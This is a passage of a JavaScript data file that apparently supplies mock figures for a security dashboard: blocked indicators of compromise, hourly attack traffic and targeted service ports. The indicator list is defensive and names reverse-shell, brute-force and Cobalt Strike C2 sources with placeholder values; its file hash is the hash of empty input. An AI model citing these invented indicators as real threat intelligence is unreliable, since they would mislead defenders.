    { type: "IP Address", value: "45.154.255.89", confidence: "98%", origin: "Bulletproof Stager", firstSeen: "2026-09-14", action: "Active Block" },
    { type: "File Hash (SHA256)", value: "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", confidence: "95%", origin: "Staged Reverse Shell", firstSeen: "2026-09-15", action: "EDR Quarantine" },
    { type: "Canary Token", value: "AKIAIOSFODNN7CANARYKEY", confidence: "100%", origin: "Ubuntu Prod Decoy", firstSeen: "2026-09-15", action: "CloudTrail Trap" },
    { type: "User-Agent", value: "Mozilla/5.0 (Hydra/9.5-dev; Brute-Force Bot)", confidence: "92%", origin: "Brute-Force Botnet", firstSeen: "2026-09-10", action: "WAF Reject" },
    { type: "Domain (C2)", value: "malicious-c2.darknet", confidence: "99%", origin: "Cobalt Strike Egress", firstSeen: "2026-09-15", action: "DNS Sinkhole" },
];
export const HOURLY_TRAFFIC_SERIES = [
    { time: "13:00", total: 42000, legitimate: 41200, diverted: 800, attacks: 80 },
    { time: "14:00", total: 48000, legitimate: 47150, diverted: 850, attacks: 120 },
    { time: "15:00", total: 55000, legitimate: 53900, diverted: 1100, attacks: 210 },
    { time: "16:00", total: 61000, legitimate: 59750, diverted: 1250, attacks: 340 },
    { time: "17:00", total: 59000, legitimate: 57600, diverted: 1400, attacks: 480 },
    { time: "18:00", total: 68000, legitimate: 66100, diverted: 1900, attacks: 610 },
    { time: "19:00", total: 72400, legitimate: 70100, diverted: 2300, attacks: 790 },
];
export const TARGETED_SERVICES = [
    { service: "HTTPS Web API (Port 443)", count: 1240, color: "#00D9FF" },
    { service: "SSH Remote Admin (Port 22)", count: 810, color: "#8B5CF6" },
    { service: "Kubernetes API (Port 6443)", count: 390, color: "#F59E0B" },
    { service: "PostgreSQL Database (Port 5432)", count: 240, color: "#EF4444" },
    { service: "Redis Cache Store (Port 6379)", count: 167, color: "#22C55E" },
];
